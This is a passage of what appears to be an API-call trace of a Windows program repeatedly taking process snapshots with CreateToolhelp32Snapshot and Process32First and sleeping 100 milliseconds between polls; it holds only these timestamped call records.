cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.218] Sleep (dwMilliseconds=0x64) [0214.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0214.492] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.601] Sleep (dwMilliseconds=0x64) [0214.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0214.697] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.953] Sleep (dwMilliseconds=0x64) [0215.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0215.025] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.151] Sleep (dwMilliseconds=0x64) [0215.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0215.188] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.323] Sleep (dwMilliseconds=0x64) [0215.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0215.440] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.706] Sleep (dwMilliseconds=0x64) [0215.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0215.764] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.885] Sleep (dwMilliseconds=0x64) [0215.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0215.924] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.130] Sleep (dwMilliseconds=0x64) [0216.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0216.250] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.362] Sleep (dwMilliseconds=0x64) [0216.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0216.462] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.553] Sleep (dwMilliseconds=0x64) [0216.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0216.572] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.897] Sleep (dwMilliseconds=0x64) [0217.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0217.015] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.201] Sleep (dwMilliseconds=0x64) [0217.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0217.226] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.289] Sleep (dwMilliseconds=0x64) [0217.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0217.303] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.414] Sleep (dwMilliseconds=0x64) [0217.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0217.459] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.627] Sleep (dwMilliseconds=0x64) [0217.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0217.692] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.780] Sleep (dwMilliseconds=0x64) [0217.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0217.811] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.018] Sleep (dwMilliseconds=0x64) [0218.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22b0 [0218.141] Process32First (in: hSnapshot=0x22b0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.313] Sleep (dwMilliseconds=0x64) [0218.381] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0218.398] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.508] Sleep (dwMilliseconds=0x64) [0218.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0218.570] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.711] Sleep (dwMilliseconds=0x64) [0218.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0218.743] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.911] Sleep (dwMilliseconds=0x64) [0219.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0219.157] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.358] Sleep (dwMilliseconds=0x64) [0219.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0219.443] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.499] Sleep (dwMilliseconds=0x64) [0219.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0219.587] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.644] Sleep (dwMilliseconds=0x64) [0219.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0219.661] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.077] Sleep (dwMilliseconds=0x64) [0220.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0220.284] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.485] Sleep (dwMilliseconds=0x64) [0220.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0220.540] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.615] Sleep (dwMilliseconds=0x64) [0220.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0220.661] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.731] Sleep (dwMilliseconds=0x64) [0220.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0220.961] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.034] Sleep (dwMilliseconds=0x64) [0221.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0221.087] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.224] Sleep (dwMilliseconds=0x64) [0221.280] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0221.339] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.431] Sleep (dwMilliseconds=0x64) [0221.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0221.567] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.679] Sleep (dwMilliseconds=0x64) [0221.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0221.696] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.786] Sleep (dwMilliseconds=0x64) [0221.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0221.937] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.070] Sleep (dwMilliseconds=0x64) [0222.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0222.194] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.275] Sleep (dwMilliseconds=0x64) [0222.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0222.351] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.470] Sleep (dwMilliseconds=0x64) [0222.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0222.524] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.718] Sleep (dwMilliseconds=0x64) [0222.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0222.743] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.863] Sleep (dwMilliseconds=0x64) [0222.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0222.937] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.117] Sleep (dwMilliseconds=0x64) [0223.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0223.216] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.301] Sleep (dwMilliseconds=0x64) [0223.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0223.320] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.520] Sleep (dwMilliseconds=0x64) [0223.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0223.593] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.064] Sleep (dwMilliseconds=0x64) [0224.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0224.178] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.430] Sleep (dwMilliseconds=0x64) [0224.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0224.456] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.629] Sleep (dwMilliseconds=0x64) [0224.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0224.679] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.780] Sleep (dwMilliseconds=0x64) [0224.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0224.812] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.866] Sleep (dwMilliseconds=0x64) [0224.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0224.880] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.982] Sleep (dwMilliseconds=0x64) [0225.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.036] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.193] Sleep (dwMilliseconds=0x64) [0225.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.264] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.339] Sleep (dwMilliseconds=0x64) [0225.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.375] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.490] Sleep (dwMilliseconds=0x64) [0225.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.564] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.675] Sleep (dwMilliseconds=0x64) [0225.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.726] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.802] Sleep (dwMilliseconds=0x64) [0225.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.817] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.884] Sleep (dwMilliseconds=0x64) [0225.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0225.896] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.064] Sleep (dwMilliseconds=0x64) [0226.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0226.132] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.242] Sleep (dwMilliseconds=0x64) [0226.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0226.421] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.486] Sleep (dwMilliseconds=0x64) [0226.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0226.514] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.708] Sleep (dwMilliseconds=0x64) [0226.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0226.759] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.904] Sleep (dwMilliseconds=0x64) [0226.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0226.939] Process32First (in: hSnapshot=0xdc4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.995] Sleep (dwMilliseconds=0x64) [0227.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0227.083] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.233] Sleep (dwMilliseconds=0x64) [0227.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0227.296] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 